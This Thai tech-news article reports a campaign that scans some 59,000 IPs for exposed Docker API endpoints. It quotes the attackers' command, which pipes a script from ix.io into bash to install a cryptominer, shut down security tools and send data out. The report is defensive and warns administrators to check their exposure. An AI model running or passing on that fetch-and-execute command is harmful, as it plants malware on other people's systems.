Breaking News

พบแฮ็กเกอร์กำลังสแกนหา Docker ผ่านทางออนไลน์ไปแล้วถึง 59,000 ไอพี

Bad Packets ผู้เชี่ยวชาญด้านภัยคุกคามทางไซเบอร์ได้ออกมาเตือนถึงความพยามในการสแกนหา Docker เพื่อหา API Endpoint ที่ให้เข้าถึงจากออนไลน์ โดยมีการสแกนไปแล้วถึง 59,000 ไอพี

Credit: Andrey Popov/ShutterStock

เมื่อวันที่ 24 พฤศจิกายนที่ผ่านมาได้มีการค้นพบการสแกนเพื่อหาเหยื่อที่ใช้งาน Docker เพื่อค้นหา API Endpoint ที่สามารถใช้งานได้ผ่านทางออนไลน์ โดยแฮ็กเกอร์จะเข้าไปสั่งเริ่ม Alpine Linux Container ด้วยคำสั่งว่า “chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash;” โดยท้ายที่สุดสคิร์ปต์ดังกล่าวจะไปเรียกติดตั้งตัวขุดเหมือง 

นอกจากนี้ผู้เชี่ยวชาญยังเผยว่าสคิร์ปต์ยังได้มีการสั่งปิดผลิตภัณฑ์ด้าน Security และสั่งปิดโปรเซส lso ซึ่งเป็นการกำจัดตัวขุดเหมือนอื่นๆ รวมถึงยังมีการลอบขโมยข้อมูลส่งกับไปหาเซิร์ฟเวอร์ด้วย ด้วยเหตุนี้เองเมื่อรู้เช่นนี้แล้วก็หมั่นตรวจสอบการใช้งานของเราเองด้วยนะครับว่ามีการเข้าถึงผ่านทางออนไลน์อย่างไร

ที่มา :  https://www.zdnet.com/article/a-hacking-group-is-hijacking-docker-systems-with-exposed-api-endpoints/



About nattakon

จบการศึกษา ปริญญาตรีและโท สาขาวิศวกรรมคอมพิวเตอร์ KMITL เคยทำงานด้าน Engineer/Presale ดูแลผลิตภัณฑ์ด้าน Network Security และ Public Cloud ในประเทศ ปัจจุบันเป็นนักเขียน Full-time ที่ TechTalkThai

Check Also

Inteltion Webinar: DATA GOVERNANCE & PDPA Journey part 2 – Are you on the right track ?

TechTalkThai ขอเรียนเชิญ IT Manager, ผู้ดูแลระบบ IT, และผู้ที่สนใจทุกท่าน เข้าร่วมชม Inteltion Webinar ในหัวข้อเรื่อง “DATA GOVERNANCE & PDPA Journey …

พบช่องโหว่บนปลั๊กอิน Newsletter บน WordPress แนะผู้ใช้เร่งอัปเดต

Wordfence ผู้เชี่ยวชาญด้านความมั่นคงปลอดภัยได้ออกมาเปิดเผยถึงช่องโหว่บนปลั๊กอิน Newsletter 2 รายการ โดยคาดว่าส่งผลกระทบต่อเว็บไซต์กว่า 300,000 แห่ง